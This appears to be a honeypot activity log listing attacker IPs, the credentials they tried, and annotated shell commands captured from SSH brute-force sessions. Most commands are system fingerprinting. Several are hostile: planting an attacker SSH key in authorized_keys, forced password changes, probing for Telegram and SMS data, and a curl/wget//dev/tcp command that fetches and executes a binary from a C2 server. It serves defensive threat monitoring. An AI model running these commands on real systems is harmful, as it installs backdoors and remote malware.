$ cat /proc/cpuinfo | grep name | wc -l
โ†ณ CPU profiling
$ echo -e "deploy123\nYpUv2j0SkqYa\nYpUv2j0SkqYa"|passwd|bash
$ Enter new UNIX password:
$ echo "deploy123\nYpUv2j0SkqYa\nYpUv2j0SkqYa\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
โ†ณ CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l
โ†ณ persistence setup
$ w
โ†ณ logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l
โ†ณ CPU profiling
$ top
โ†ณ process monitoring
$ uname
โ†ณ OS identification
$ uname -a
โ†ณ OS/kernel identification
$ whoami
โ†ณ privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
๐ŸŽญ lurking_lotus_root (160.250.5.104) โ€” Hฦฐng Thร nh, Vietnam ยท 32 sessions ยท 32 cmds
2026-06-12 22:53 EDT ยท as admin/123456, admin/admin, admin/admin123
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -s -v -n -r -m ร—32
๐ŸŽญ unhinged_carnival_root (191.8.216.111) โ€” Sรฃo Paulo, Brazil ยท 1 session ยท 2 cmds
2026-06-13 03:05 EDT ยท as oracle/Oracle123
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ lurking_shogun_root_62 (35.72.5.62) โ€” Tokyo, Japan ยท 2 sessions ยท 2 cmds
2026-06-13 02:41 EDT ยท as root/password, root/root
Ran uname 2x across 2 sessions โ€” automated OS fingerprinting.
$ which ls 2>/dev/null || echo 'missing:ls'; echo '---SEP---'; which ps 2>/dev/null || echo 'missing:ps'; echo '---SEP---'; which cat 2>/dev/null || echo 'missing:cat'; echo '---SEP---'; which netstat 2>/dev/null || echo 'missing:netstat'; echo '---SEP---'; uname -m 2>/dev/null | tr -d '\n\r' || echo 'unknown'; echo '---SEP---'; cat /etc/os-release 2>/dev/null | grep '^NAME=' | cut -d'=' -f2 | tr -d '"' | tr -d '\n\r' || echo 'Linux'; echo '---SEP---'; hostname 2>/dev/null | tr -d '\n\r' || echo 'unknown'; echo '---SEP---'; curl -s --connect-timeout 2 ipinfo.io/country 2>/dev/null | tr -d '\n\r' || echo 'N/A'; echo '---SEP---'; nproc 2>/dev/null | tr -d '\n\r' || echo '1'; echo '---SEP---'; free -h 2>/dev/null | awk '/^Mem:/ {print $2}' | tr -d '\n\r' || echo 'N/A'; echo '---SEP---'; df -h / 2>/dev/null | awk 'NR==2{print $2}' | tr -d '\n\r' || echo 'N/A'; echo '---END---' ร—2
โ†ณ payload download
๐ŸŽญ stoic_stroopwafel_root (192.109.200.220) โ€” Eygelshoven, The Netherlands ยท 31 sessions ยท 31 cmds
2026-06-13 01:29 EDT ยท as admin/123456, admin/admin, admin/admin123
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -s -v -n -r -m ร—31
๐ŸŽญ brisk_harbor_root (40.81.16.211) โ€” Hong Kong, Hong Kong ยท 1 session ยท 1 cmd
2026-06-13 02:11 EDT ยท as root/12345678
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ lurking_shogun_root (207.148.108.129) โ€” Minamishinagawa, Japan ยท 1 session ยท 1 cmd
2026-06-12 21:12 EDT ยท as user/user
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ unhinged_cowboy_root (73.36.177.174) โ€” Lombard, United States ยท 1 session ยท 2 cmds
2026-06-12 18:26 EDT ยท as oracle/Welcome1
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ jittery_panda_root (150.158.13.42) โ€” Shanghai, China ยท 1 session ยท 2 cmds
2026-06-12 17:50 EDT ยท as oracle/Welcome1
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ aloof_seoul_root (59.26.193.177) โ€” Daejeon, South Korea ยท 2 sessions ยท 18 cmds
2026-05-19 09:17 EDT ยท as root/root
network mapping โ†’ OS/kernel identification โ†’ CPU profiling
$ /ip cloud print ร—2
$ ifconfig ร—2
โ†ณ network mapping
$ uname -a ร—2
โ†ณ OS/kernel identification
$ cat /proc/cpuinfo ร—2
โ†ณ CPU profiling
$ ps | grep '[Mm]iner' ร—2
$ ps -ef | grep '[Mm]iner' ร—2
$ ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/* ร—2
$ locate D877F783D5D3EF8Cs ร—2
$ echo Hi | cat -n ร—2
๐ŸŽญ brazen_windmill_root (77.83.39.101) โ€” Amsterdam, The Netherlands ยท 1 session ยท 1 cmd
2026-06-06 09:01 EDT ยท as oracle/123qwerty
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ cat /proc/cpuinfo|grep name|cut -f2 -d':'|uniq -c ; uname -a
โ†ณ CPU profiling
๐ŸŽญ feral_shadow_root (130.12.181.103) โ€” Ljubljana, Slovenia ยท 1 session ยท 1 cmd
2026-06-04 22:48 EDT ยท as oracle/p4ssword
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ cat /proc/cpuinfo|grep name|cut -f2 -d':'|uniq -c ; uname -a
โ†ณ CPU profiling
๐ŸŽญ midnight_dutch_root (77.83.39.237) โ€” Amsterdam, The Netherlands ยท 1 session ยท 1 cmd
2026-06-04 14:40 EDT ยท as root/admin
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ cat /proc/cpuinfo|grep name|cut -f2 -d':'|uniq -c ; uname -a
โ†ณ CPU profiling
๐ŸŽญ aloof_echo_root (130.12.181.100) โ€” Ljubljana, Slovenia ยท 1 session ยท 1 cmd
2026-06-04 07:02 EDT ยท as oracle/vps
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ cat /proc/cpuinfo|grep name|cut -f2 -d':'|uniq -c ; uname -a
โ†ณ CPU profiling
๐ŸŽญ crimson_dutch_root (77.83.39.217) โ€” Amsterdam, The Netherlands ยท 1 session ยท 1 cmd
2026-06-04 05:12 EDT ยท as oracle/welc0me@123
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ cat /proc/cpuinfo|grep name|cut -f2 -d':'|uniq -c ; uname -a
โ†ณ CPU profiling
๐ŸŽญ crimson_wraith_root (130.12.181.97) โ€” Ljubljana, Slovenia ยท 1 session ยท 1 cmd
2026-06-04 01:46 EDT ยท as oracle/welcome1
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ cat /proc/cpuinfo|grep name|cut -f2 -d':'|uniq -c ; uname -a
โ†ณ CPU profiling
๐ŸŽญ unhinged_windmill_root_154 (77.83.39.154) โ€” Amsterdam, The Netherlands ยท 1 session ยท 1 cmd
2026-06-04 01:04 EDT ยท as oracle/pass1234
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ cat /proc/cpuinfo|grep name|cut -f2 -d':'|uniq -c ; uname -a
โ†ณ CPU profiling
๐ŸŽญ spectral_moose_root (69.48.229.92) โ€” Montreal, Canada ยท 3 sessions ยท 3 cmds
2026-06-04 00:41 EDT ยท as root/123456, root/password, root/root
privilege check (repeated privilege check 3x)
$ id ร—3
โ†ณ privilege check
๐ŸŽญ velvet_tulip_sol (77.83.39.226) โ€” Amsterdam, The Netherlands ยท 1 session ยท 1 cmd
2026-06-03 15:37 EDT ยท as oracle/Abc12345
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ cat /proc/cpuinfo|grep name|cut -f2 -d':'|uniq -c ; uname -a
โ†ณ CPU profiling
๐ŸŽญ midnight_tulip_root (77.83.39.238) โ€” Amsterdam, The Netherlands ยท 1 session ยท 1 cmd
2026-06-03 12:56 EDT ยท as oracle/1234.com
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ cat /proc/cpuinfo|grep name|cut -f2 -d':'|uniq -c ; uname -a
โ†ณ CPU profiling
๐ŸŽญ nocturnal_wraith_root (130.12.181.106) โ€” Ljubljana, Slovenia ยท 1 session ยท 1 cmd
2026-06-03 04:23 EDT ยท as oracle/dell-2023
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ cat /proc/cpuinfo|grep name|cut -f2 -d':'|uniq -c ; uname -a
โ†ณ CPU profiling
๐ŸŽญ brazen_void_root (130.12.181.101) โ€” Ljubljana, Slovenia ยท 1 session ยท 1 cmd
2026-06-02 19:44 EDT ยท as oracle/passw0rd
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ cat /proc/cpuinfo|grep name|cut -f2 -d':'|uniq -c ; uname -a
โ†ณ CPU profiling
๐ŸŽญ wired_void_db (130.12.181.102) โ€” Ljubljana, Slovenia ยท 1 session ยท 1 cmd
2026-06-02 15:21 EDT ยท as oracle/1qazwsx
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ cat /proc/cpuinfo|grep name|cut -f2 -d':'|uniq -c ; uname -a
โ†ณ CPU profiling
๐ŸŽญ scrappy_windmill_db (77.83.39.227) โ€” Amsterdam, The Netherlands ยท 1 session ยท 1 cmd
2026-06-02 14:22 EDT ยท as postgres/postgres
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ cat /proc/cpuinfo|grep name|cut -f2 -d':'|uniq -c ; uname -a
โ†ณ CPU profiling
๐ŸŽญ aloof_liberty_sol (92.118.39.63) โ€” Dallas, United States ยท 667 sessions ยท 667 cmds
2026-05-06 18:47 EDT ยท as sol/123, sol/12345678, sol/sol
Ran uname 960x across 960 sessions โ€” automated OS fingerprinting.
$ /bin/./uname -s -v -n -r -m ร—667
โ†ณ obfuscated system check
๐ŸŽญ velvet_komodo_crypto (103.24.212.42) โ€” Semarang, Indonesia ยท 112 sessions ยท 113 cmds
2026-05-12 21:18 EDT ยท as bitcoin/bitcoin
echo BMOK โ†’ echo OK โ†’ grep -c "^phil:" /etc/passwd โ†’ bash -c "id phil 2>&1; echo EXIT=\$?" โ†’ id phil 2>&1; echo EXIT=\$? โ†’ id phil 2>&1; echo EXITCODE=$? โ†’ getent passwd phil 2>/dev/null && echo 'PHILEXISTS' || echo '
$ echo BMOK ร—106
$ echo OK
$ grep -c "^phil:" /etc/passwd
$ bash -c "id phil 2>&1; echo EXIT=\$?"
$ id phil 2>&1; echo EXIT=\$?
$ id phil 2>&1; echo EXIT_CODE=$?
$ getent passwd phil 2>/dev/null && echo 'PHIL_EXISTS' || echo 'NO_PHIL'
โ†ณ password change attempt
$ echo 'SSH_OK'; hostname; whoami; id
๐ŸŽญ zealous_panda_root_170 (139.170.141.170) โ€” Xining, China ยท 1 session ยท 1 cmd
2026-05-22 01:36 EDT ยท as deploy/deploy123
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ manic_dragon_root_204 (113.44.116.204) โ€” Beijing, China ยท 1 session ยท 5 cmds
2026-05-22 01:27 EDT ยท as root/123456
echo โ†’ payload download from C2 โ†’ execute from /tmp โ†’ '8
$ echo 1 > /dev/null && cat /bin/echo
$ nohup $SHELL -c "curl http://39.97.246.227:9613/linux -o /tmp/xiyhIaz9hs; if [ ! -f /tmp/xiyhIaz9hs ]; then wget http://39.97.246.227:9613/linux -O /tmp/xiyhIaz9hs; fi; if [ ! -f /tmp/xiyhIaz9hs ]; then exec 6<>/dev/tcp/39.97.246.227/9613 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/xiyhIaz9hs ; chmod +x /tmp/xiyhIaz9hs && /tmp/xiyhIaz9hs JwGdCT9gfhGRISciPY0dfnQ/CJ4TRlIWggk0f2IZhyc8IyCHEnV2NAuMFVFIGZoWNHdiGYgjKCQjjhl1bjcJlA9XURmCCTJ6YhyOKSUmJYcIeHkoAJUPVFITggk0fXYehyUlMiuRGn12KAqcEkhfEZYAMXl1CIc9IyYrkR51YDcKlRtfVxGZGDV3YhGIPSAmJZEafnk8AZoQVUYXnBY3eXwGjSYhPCSIEnp+NwiZAVJfD54LMmB5HpEiKispiRp0diYAghNXUQ+eCDVgfhuHKSUnIY4IfXY1Fp0QSFQTmhY0fnsSiCIgJzOLH2J8MgqCEFZeD5sJPHh8GY8kMiYkkRp4fCgNlA9eUhuaCDd+dQiLJDwgIIYGfXc3Fp0WUVwXng82bn0ZjD0mJj2OGXpgNAiYG1BfGZsYN390Bo4jJTwmkRp+dzwOmhVVRhWZFjd9fwaIJjwnIoUeeH4/GJ4QVEgZnBY0fnkGjiAlKCqOEXpuMg+CEFRXD50AMmB9G4cpKyohjAh9eTAWlBlIXw+dCDB0dRCIJDIjJo0Gf3woCpgRSFcXmwI/e3kenyclPCGMEWJ/MQmCEFdeG5sNMHtsHIg9KiQ9jRFifzEIlhdWVxCVGDd2fwaOIjwgIYkGfn4xApsQVFMBnQgwYH0akSIkIz2OHnV0MQ6UE0ZSFoIKNXdiGYYiPCMkiBJ6fDEIjBJfSBiaFjd3ewaMJCgkIIYdbHg2Fp0XSF4PmAo8d3kejDMqPCGOH2J8NguCE1VeG5sNNH99Af+rF6Fy+aBmuKp1H9E+7xGTUyAbARc=; fi; echo 123456 > /tmp/.opass; chmod +x /tmp/xiyhIaz9hs && /tmp/xiyhIaz9hs JwGdCT9gfhGRISciPY0dfnQ/CJ4TRlIWggk0f2IZhyc8IyCHEnV2NAuMFVFIGZoWNHdiGYgjKCQjjhl1bjcJlA9XURmCCTJ6YhyOKSUmJYcIeHkoAJUPVFITggk0fXYehyUlMiuRGn12KAqcEkhfEZYAMXl1CIc9IyYrkR51YDcKlRtfVxGZGDV3YhGIPSAmJZEafnk8AZoQVUYXnBY3eXwGjSYhPCSIEnp+NwiZAVJfD54LMmB5HpEiKispiRp0diYAghNXUQ+eCDVgfhuHKSUnIY4IfXY1Fp0QSFQTmhY0fnsSiCIgJzOLH2J8MgqCEFZeD5sJPHh8GY8kMiYkkRp4fCgNlA9eUhuaCDd+dQiLJDwgIIYGfXc3Fp0WUVwXng82bn0ZjD0mJj2OGXpgNAiYG1BfGZsYN390Bo4jJTwmkRp+dzwOmhVVRhWZFjd9fwaIJjwnIoUeeH4/GJ4QVEgZnBY0fnkGjiAlKCqOEXpuMg+CEFRXD50AMmB9G4cpKyohjAh9eTAWlBlIXw+dCDB0dRCIJDIjJo0Gf3woCpgRSFcXmwI/e3kenyclPCGMEWJ/MQmCEFdeG5sNMHtsHIg9KiQ9jRFifzEIlhdWVxCVGDd2fwaOIjwgIYkGfn4xApsQVFMBnQgwYH0akSIkIz2OHnV0MQ6UE0ZSFoIKNXdiGYYiPCMkiBJ6fDEIjBJfSBiaFjd3ewaMJCgkIIYdbHg2Fp0XSF4PmAo8d3kejDMqPCGOH2J8NguCE1VeG5sNNH99Af+rF6Fy+aBmuKp1H9E+7xGTUyAbARc=" &
โ†ณ payload download from C2
$ head -c 3716336 > /tmp/qpyTTUq2BJ
โ†ณ execute from /tmp
$ echo 1 > /dev/null && cat /bin/echoQtd#0000
$ >A@/`'8
๐ŸŽญ wily_dragon_root_14 (120.27.149.14) โ€” Hangzhou, China ยท 1 session ยท 1 cmd
2026-05-22 01:08 EDT ยท as root/123456
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -s -m
๐ŸŽญ crimson_satay_root (103.175.16.86) โ€” Cyberjaya, Malaysia ยท 2 sessions ยท 2 cmds
2026-05-10 02:38 EDT ยท as pi/raspberry, tomcat/tomcat
Ran uname 3x across 3 sessions โ€” automated OS fingerprinting.
$ uname -a ร—2
โ†ณ OS/kernel identification
๐ŸŽญ silent_silk_root_171 (39.96.6.171) โ€” Beijing, China ยท 1 session ยท 1 cmd
2026-05-21 22:27 EDT ยท as mysql/mysql
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ wily_strudel (91.98.114.126) โ€” Nuremberg, Germany ยท 1 session ยท 1 cmd
2026-05-21 21:26 EDT ยท as deploy/deploy
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ haywire_clog_sol (193.32.162.35) โ€” Amsterdam, The Netherlands ยท 204 sessions ยท 204 cmds
2026-05-13 14:16 EDT ยท as bitcoin/bitcoin, eth/eth, firedancer/firedancer
Ran uname 204x across 204 sessions โ€” automated OS fingerprinting.
$ /bin/./uname -s -v -n -r -m ร—204
โ†ณ obfuscated system check
๐ŸŽญ ashen_hawker_root (43.134.72.220) โ€” Singapore, Singapore ยท 1 session ยท 1 cmd
2026-05-21 21:05 EDT ยท as root/12345678
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ nocturnal_toque_root (4.204.204.51) โ€” Toronto, Canada ยท 1 session ยท 1 cmd
2026-05-21 20:50 EDT ยท as user/password
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ clandestine_panda (8.135.29.109) โ€” Shenzhen, China ยท 1 session ยท 1 cmd
2026-05-21 20:14 EDT ยท as deploy/deploy123
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ frantic_dragon (47.120.26.188) โ€” Shenzhen, China ยท 1 session ยท 1 cmd
2026-05-21 20:09 EDT ยท as test/123456
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ rabid_panda_root_158 (222.90.32.158) โ€” Xi'an, China ยท 2 sessions ยท 2 cmds
2026-05-18 01:38 EDT ยท as admin/admin123, user/password
Ran uname 2x across 2 sessions โ€” automated OS fingerprinting.
$ uname -a ร—2
โ†ณ OS/kernel identification
๐ŸŽญ weary_silk_root_49 (8.130.115.49) โ€” Beijing, China ยท 1 session ยท 1 cmd
2026-05-21 17:11 EDT ยท as deploy/deploy
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ sneaky_kopi_root (43.156.203.174) โ€” Singapore, Singapore ยท 2 sessions ยท 2 cmds
2026-05-15 06:15 EDT ยท as root/123456
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a ร—2
โ†ณ OS/kernel identification
๐ŸŽญ murky_bonsai_root (132.145.115.202) โ€” Tokyo, Japan ยท 3 sessions ยท 3 cmds
2026-05-08 17:24 EDT ยท as deploy/deploy, root/1234, root/root
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a ร—3
โ†ณ OS/kernel identification
๐ŸŽญ restless_cowboy_sol (206.189.229.161) โ€” North Bergen, United States ยท 1 session ยท 1 cmd
2026-05-21 14:45 EDT ยท as sol/sol
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ /bin/./uname -s -v -n -r -m
โ†ณ obfuscated system check
๐ŸŽญ ironclad_panda_root (116.177.172.108) โ€” Jinrongjie, China ยท 5 sessions ยท 5 cmds
2026-05-08 05:00 EDT ยท as admin/123456, pi/raspberry, root/123456
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a ร—5
โ†ณ OS/kernel identification
๐ŸŽญ ironclad_cowboy_root (159.65.221.34) โ€” North Bergen, United States ยท 2 sessions ยท 2 cmds
2026-05-11 16:11 EDT ยท as oracle/test1234, pi/raspberry
Ran uname 2x across 2 sessions โ€” automated OS fingerprinting.
$ uname -a ร—2
โ†ณ OS/kernel identification
๐ŸŽญ unhinged_silk_root (8.134.170.118) โ€” Guangzhou, China ยท 1 session ยท 1 cmd
2026-05-21 12:00 EDT ยท as mysql/mysql
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ feral_bike_root_121 (176.65.139.121) โ€” Eygelshoven, The Netherlands ยท 5 sessions ยท 5 cmds
2026-05-21 11:48 EDT ยท as admin/admin, pi/raspberry, root/1234
cat (repeated cat 5x)
$ cat /proc/version && cat /etc/hostname 2>/dev/null || cat /etc/hosts 2>/dev/null ร—5
๐ŸŽญ brazen_lantern_root (110.41.159.219) โ€” Guangzhou, China ยท 1 session ยท 1 cmd
2026-05-21 11:38 EDT ยท as pi/raspberry
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ ashen_scarab_root (156.218.45.217) โ€” Madฤซnat as Sฤdฤt, Egypt ยท 1 session ยท 9 cmds
2026-05-21 10:32 EDT ยท as root/root
root/root login โ†’ /ip cloud print โ†’ ifconfig โ†’ uname -a โ†’ cat /proc/cpuinfo โ†’ ps | grep '[Mm]iner' โ†’ ps -ef | grep '[Mm]iner' โ†’ ls -la ~/.local/share/TelegramDesktop/tdata /home//.local/share/TelegramDesktop/tdata /dev/ttyGSM โ†’ locate D877F7
$ /ip cloud print
$ ifconfig
โ†ณ network mapping
$ uname -a
โ†ณ OS/kernel identification
$ cat /proc/cpuinfo
โ†ณ CPU profiling
$ ps | grep '[Mm]iner'
$ ps -ef | grep '[Mm]iner'
$ ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*
$ locate D877F783D5D3EF8Cs
$ echo Hi | cat -n
๐ŸŽญ rabid_gouda_sol (193.32.162.145) โ€” Amsterdam, The Netherlands ยท 26 sessions ยท 26 cmds
2026-05-09 21:00 EDT ยท as jito/jito, raydium/raydium, sol/sol
Ran uname 71x across 71 sessions โ€” automated OS fingerprinting.
$ /bin/./uname -s -v -n -r -m ร—26
โ†ณ obfuscated system check
๐ŸŽญ aloof_chateau_root (128.78.143.196) โ€” Grenoble, France ยท 2 sessions ยท 39 cmds
2026-05-21 09:20 EDT ยท as guest/guest, root/password
file attribute tampering โ†’ SSH key persistence โ†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh ร—2
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ ร—2
โ†ณ SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l ร—2
โ†ณ CPU profiling
$ echo -e "guest\nuq1CpyhyvGdT\nuq1CpyhyvGdT"|passwd|bash
$ Enter new UNIX password:
$ echo "guest\nuq1CpyhyvGdT\nuq1CpyhyvGdT\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' ร—2
โ†ณ CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' ร—2
$ ls -lh $(which ls) ร—2
$ which ls ร—2
$ crontab -l ร—2
โ†ณ persistence setup
$ w ร—2
โ†ณ logged-in users check
$ uname -m ร—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l ร—2
โ†ณ CPU profiling
$ top ร—2
โ†ณ process monitoring
$ uname ร—2
โ†ณ OS identification
$ uname -a ร—2
โ†ณ OS/kernel identification
$ whoami ร—2
โ†ณ privilege check
$ lscpu | grep Model ร—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' ร—2
$ echo "root:INMF8mmy7qG0"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;
โ†ณ execute from /tmp
๐ŸŽญ baroque_hanbok_root (59.27.249.238) โ€” Cheonan, South Korea ยท 1 session ยท 9 cmds
2026-05-21 09:39 EDT ยท as root/root
network mapping โ†’ OS/kernel identification โ†’ CPU profiling
$ /ip cloud print
$ ifconfig
โ†ณ network mapping
$ uname -a
โ†ณ OS/kernel identification
$ cat /proc/cpuinfo
โ†ณ CPU profiling
$ ps | grep '[Mm]iner'
$ ps -ef | grep '[Mm]iner'
$ ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*
$ locate D877F783D5D3EF8Cs
$ echo Hi | cat -n
๐ŸŽญ ironclad_acai_root (191.6.25.239) โ€” Sรฃo Domingos do Maranhรฃo, Brazil ยท 1 session ยท 20 cmds
2026-05-21 09:30 EDT ยท as tomcat/tomcat123
file attribute tampering โ†’ SSH key persistence โ†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l
โ†ณ CPU profiling
$ echo -e "tomcat123\nOzcwanL3xW3k\nOzcwanL3xW3k"|passwd|bash
